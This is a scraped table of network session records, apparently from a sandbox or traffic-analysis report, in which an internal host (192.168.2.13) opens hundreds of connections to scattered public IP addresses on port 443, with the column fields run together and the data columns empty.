                                    23433192.168.2.1357406148.186.117.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23434192.168.2.1343178118.40.122.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23435192.168.2.1349174196.51.39.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23436192.168.2.134633450.229.49.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23437192.168.2.135205057.239.227.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23438192.168.2.135145859.189.203.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23439192.168.2.133892014.241.144.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23440192.168.2.135374038.30.63.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23441192.168.2.1356036111.68.222.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23442192.168.2.133291427.76.144.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23443192.168.2.1338240137.200.204.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23444192.168.2.1344562120.241.105.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23445192.168.2.1334878134.107.130.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23446192.168.2.1338230171.70.187.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23447192.168.2.1336946199.111.253.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23448192.168.2.1336086147.202.152.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23449192.168.2.1355492187.177.45.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23450192.168.2.1343724145.123.27.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23451192.168.2.1353172181.35.53.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23452192.168.2.1343490216.38.185.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23453192.168.2.1360938154.102.173.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23454192.168.2.1360790113.102.247.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23455192.168.2.1344814131.227.122.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23456192.168.2.13477869.96.190.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23457192.168.2.1340086175.93.1.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23458192.168.2.1351456133.50.226.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23459192.168.2.1355110169.61.85.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23460192.168.2.1335490141.26.24.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23461192.168.2.134396096.221.184.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23462192.168.2.1337154221.61.41.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23463192.168.2.133596865.201.89.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23464192.168.2.134730060.21.30.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23465192.168.2.1340502174.229.8.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23466192.168.2.1360100203.52.232.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23467192.168.2.133287284.61.225.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23468192.168.2.133376889.239.237.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23469192.168.2.1355544152.67.150.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23470192.168.2.13478284.20.41.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23471192.168.2.1340376176.107.88.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23472192.168.2.135666432.183.2.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23473192.168.2.1346374162.246.78.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23474192.168.2.133280884.39.41.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23475192.168.2.134741673.117.94.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23476192.168.2.13543849.110.30.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23477192.168.2.133499477.228.21.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23478192.168.2.1334784219.203.101.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23479192.168.2.135572452.35.167.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23480192.168.2.133361620.65.14.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23481192.168.2.133352073.9.78.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23482192.168.2.1338124209.142.175.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23483192.168.2.134079444.182.149.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23484192.168.2.135655471.38.84.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23485192.168.2.136068899.188.253.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23486192.168.2.135013896.176.2.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23487192.168.2.1338492152.153.176.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23488192.168.2.135156689.232.10.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23489192.168.2.1357834177.122.146.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23490192.168.2.134212280.221.157.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23491192.168.2.134086063.3.70.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23492192.168.2.134498074.166.68.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23493192.168.2.134230664.61.29.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23494192.168.2.1359844204.43.253.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23495192.168.2.1341430196.243.190.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23496192.168.2.133301023.93.184.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23497192.168.2.1350380178.237.59.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23498192.168.2.135319625.117.118.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23499192.168.2.1337510205.183.182.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23500192.168.2.134701675.100.80.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23501192.168.2.135284619.41.35.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23502192.168.2.1334190111.44.212.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23503192.168.2.1333976201.191.240.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23504192.168.2.133448491.134.15.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23505192.168.2.1348894198.52.43.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23506192.168.2.1336794154.40.121.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23507192.168.2.133952436.107.81.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23508192.168.2.1342164175.26.128.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23509192.168.2.133535096.15.160.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23510192.168.2.1356892212.7.18.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23511192.168.2.135632069.118.138.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23512192.168.2.134830439.204.93.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23513192.168.2.1346818169.42.223.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23514192.168.2.1348326120.14.83.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23515192.168.2.1335676190.46.125.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23516192.168.2.1358452154.31.137.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23517192.168.2.134974475.54.36.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23518192.168.2.1358626100.196.11.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23519192.168.2.133919292.216.11.141443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23520192.168.2.136086486.118.125.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23521192.168.2.1355286195.44.245.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23522192.168.2.1339280141.129.74.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23523192.168.2.136071432.150.167.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23524192.168.2.133280814.38.78.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23525192.168.2.1347820114.187.43.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23526192.168.2.1340488212.103.221.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23527192.168.2.1353160149.3.97.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23528192.168.2.136076081.101.240.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23529192.168.2.1348442178.3.89.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23530192.168.2.133314624.66.253.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23531192.168.2.1352950182.23.172.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23532192.168.2.13507749.17.156.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23533192.168.2.133438485.128.237.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23534192.168.2.135461641.202.54.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23535192.168.2.1344736115.106.223.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23536192.168.2.1340406151.52.80.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23537192.168.2.135879070.184.36.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23538192.168.2.135161672.69.189.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23539192.168.2.133467267.204.30.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23540192.168.2.1341026195.29.49.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23541192.168.2.1332934211.142.5.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23542192.168.2.1334926124.145.151.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23543192.168.2.1340468126.8.7.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23544192.168.2.1333798168.198.18.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23545192.168.2.133894664.73.202.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23546192.168.2.1357580218.20.163.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23547192.168.2.1335662132.184.159.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23548192.168.2.1335662121.240.117.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23549192.168.2.1339682116.95.255.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23550192.168.2.1337852148.54.37.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23551192.168.2.134074081.232.237.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23552192.168.2.1358922102.239.105.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23553192.168.2.1352144190.235.111.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23554192.168.2.134133084.64.137.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23555192.168.2.1354496124.50.59.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23556192.168.2.1358074160.229.251.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23557192.168.2.1346824102.118.170.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23558192.168.2.13345908.255.58.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23559192.168.2.135117841.184.201.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23560192.168.2.135773661.199.226.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23561192.168.2.134958060.74.85.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23562192.168.2.134969070.201.22.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23563192.168.2.133749860.251.232.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23564192.168.2.135743472.9.89.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23565192.168.2.1356200160.109.217.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23566192.168.2.134570276.1.188.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23567192.168.2.13463781.122.162.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23568192.168.2.134825664.242.217.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23569192.168.2.135552257.166.178.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23570192.168.2.1345710103.17.84.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23571192.168.2.1340524134.40.5.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23572192.168.2.1360710128.158.56.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23573192.168.2.1343118163.37.154.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23574192.168.2.136045249.177.129.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23575192.168.2.1352542105.35.184.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23576192.168.2.1344876103.149.185.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23577192.168.2.133466214.193.128.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23578192.168.2.1338504166.238.140.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23579192.168.2.1359044202.166.77.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23580192.168.2.1357604117.75.92.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23581192.168.2.1352034141.67.246.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23582192.168.2.1354418185.194.198.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23583192.168.2.1355808222.78.165.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23584192.168.2.135259454.15.57.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23585192.168.2.1333314216.3.8.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23586192.168.2.135205431.147.69.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23587192.168.2.1340532191.253.248.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23588192.168.2.1343614207.210.66.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23589192.168.2.1359088199.242.101.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23590192.168.2.1352784198.133.4.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23591192.168.2.1342298129.21.182.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23592192.168.2.135224851.8.255.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23593192.168.2.134339036.14.59.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23594192.168.2.135314298.154.63.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23595192.168.2.135859034.21.20.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23596192.168.2.13453109.142.101.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23597192.168.2.1357538176.123.117.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23598192.168.2.1349478100.164.86.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23599192.168.2.1333172119.47.56.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23600192.168.2.1346584223.135.158.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23601192.168.2.1338850213.180.156.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23602192.168.2.1354312193.242.143.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23603192.168.2.1355942174.212.212.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23604192.168.2.1358756181.174.5.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23605192.168.2.1340904113.16.221.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23606192.168.2.1336542140.172.180.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23607192.168.2.134397432.137.119.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23608192.168.2.134739491.183.176.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23609192.168.2.1345224142.180.10.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23610192.168.2.1344184112.125.246.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23611192.168.2.133534627.122.133.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23612192.168.2.1359286164.27.7.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23613192.168.2.134172074.165.139.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23614192.168.2.1336456212.47.177.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23615192.168.2.1340640197.218.235.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23616192.168.2.135027241.37.114.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23617192.168.2.1358610113.203.0.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23618192.168.2.133528486.26.86.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23619192.168.2.135299017.40.98.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23620192.168.2.13342681.2.237.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23621192.168.2.13342402.113.119.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23622192.168.2.1339426129.163.108.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23623192.168.2.133758842.23.218.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23624192.168.2.1358350181.98.69.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23625192.168.2.1359322160.37.189.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23626192.168.2.1339070216.18.159.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23627192.168.2.134787070.250.188.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23628192.168.2.135867885.12.157.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23629192.168.2.133590866.67.146.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23630192.168.2.133603841.102.139.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23631192.168.2.1337518202.178.237.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23632192.168.2.135885467.125.84.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23633192.168.2.1351648202.101.79.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23634192.168.2.1354358178.239.168.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23635192.168.2.135171299.249.125.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23636192.168.2.1348514145.217.188.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23637192.168.2.1333726223.18.132.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23638192.168.2.1338000173.8.117.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23639192.168.2.135767253.104.236.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23640192.168.2.1350834219.248.172.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23641192.168.2.134025470.29.255.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23642192.168.2.1348260177.198.131.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23643192.168.2.133934698.124.20.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23644192.168.2.1359968138.116.207.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23645192.168.2.133920617.170.52.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23646192.168.2.1350838120.53.62.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23647192.168.2.134210487.208.175.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23648192.168.2.135394234.100.251.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23649192.168.2.1349320178.183.13.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23650192.168.2.134104036.100.63.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23651192.168.2.135384895.180.43.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23652192.168.2.135502661.9.4.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23653192.168.2.1359312182.123.250.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    23654192.168.2.1348544198.53.223.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
